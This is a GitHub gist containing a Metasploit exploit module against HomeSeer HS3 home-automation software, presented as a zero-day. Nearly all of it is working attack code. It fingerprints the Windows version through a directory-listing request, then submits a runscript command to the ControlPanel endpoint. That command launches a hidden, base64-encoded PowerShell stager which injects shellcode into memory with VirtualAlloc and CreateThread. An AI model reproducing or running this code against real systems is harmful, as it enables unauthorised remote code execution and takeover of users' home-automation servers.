Skip to content

Instantly share code, notes, and snippets.

@phikshun
Created March 17, 2014 19:58
Show Gist options
  • Save phikshun/9606994 to your computer and use it in GitHub Desktop.
Save phikshun/9606994 to your computer and use it in GitHub Desktop.
HomeSeer HS3 Code Execution
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HomeSeer Code Execution Vulnerability',
'Description' => %q{
This exploit abuses a file upload issue and directory traversal in order
to obtain code execution in HomeSeer HS3.
},
'Author' => [ 'phikshun' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14774 $',
'References' =>
[
[ 'NA', 'NA' ],
],
'DefaultOptions' =>
{
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 7/8 x86/x64', { 'Arch' => ARCH_X86 } ],
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => '0 day, yo'))
end
def check_x64
print_status('Checking windows version')
res = send_request_cgi(
{
'uri' => '/status',
'method' => 'POST',
'data' => "dir=\\"
})
if res.body =~ /Program Files \(x86\)/
print_status('Found 64-bit Windows')
return true
else
print_status('Found 32-bit Windows')
return false
end
end
def launch_shell(shell)
shell = Rex::Text.uri_encode(shell)
post_params = "devlist=&scriptcmd=#{shell}&id=runscript_ID598385&runscript=Submit"
print_status('Uploading shell')
res = send_request_cgi(
{
'uri' => '/ControlPanel',
'method' => 'POST',
'data' => post_params
})
end
def exploit
print_status('Building powershell stager')
# Create powershell script that will inject shell code from the selected payload
ps = "$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
# Unicode encode powershell script
ps_uni = Rex::Text.to_unicode(ps)
# Base64 encode unicode
ps_b64 = Rex::Text.encode_base64(ps_uni)
# Final arguments for powershell
args = "-w hidden -nop -ep bypass -noexit -encodedCommand #{ps_b64}"
if check_x64
psh = "c:\\\\windows\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
else
psh = "c:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
end
script = "&hs.Launch \"#{psh}\", \"#{args}\", \"\", 0"
launch_shell(script)
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment